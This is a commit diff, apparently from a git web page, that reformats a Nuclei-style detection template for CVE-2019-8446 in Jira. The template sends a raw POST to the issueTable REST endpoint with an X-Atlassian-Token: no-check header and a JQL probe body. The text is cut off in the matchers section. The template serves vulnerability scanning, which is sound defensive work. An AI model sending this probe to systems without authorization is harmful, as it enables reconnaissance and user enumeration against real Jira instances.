Update CVE-2019-8446.yaml
parent
cf8f9ac094
commit
15c7472891
|
@ -5,20 +5,20 @@ info:
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: jira,cve2019
|
tags: jira,cve2019
|
||||||
reference: https://github.com/CyberTrashPanda/CVE-2019-8446
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}/rest/issueNav/1/issueTable'
|
POST /rest/issueNav/1/issueTable HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36"
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
|
||||||
Connection: "Close"
|
Connection: Close
|
||||||
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||||
X-Atlassian-Token: "no-check"
|
X-Atlassian-Token: no-check
|
||||||
Accept-Encoding: "gzip, deflate"
|
Accept-Encoding: gzip, deflate
|
||||||
Accept-Language: "en-US,en;q=0.9"
|
Accept-Language: en-US,en;q=0.9
|
||||||
body: {'jql':'project in projectsLeadByUser("g147isalive")'}
|
|
||||||
|
{'jql':'project in projectsLeadByUser("g147isalive")'}
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
Loading…
Reference in New Issue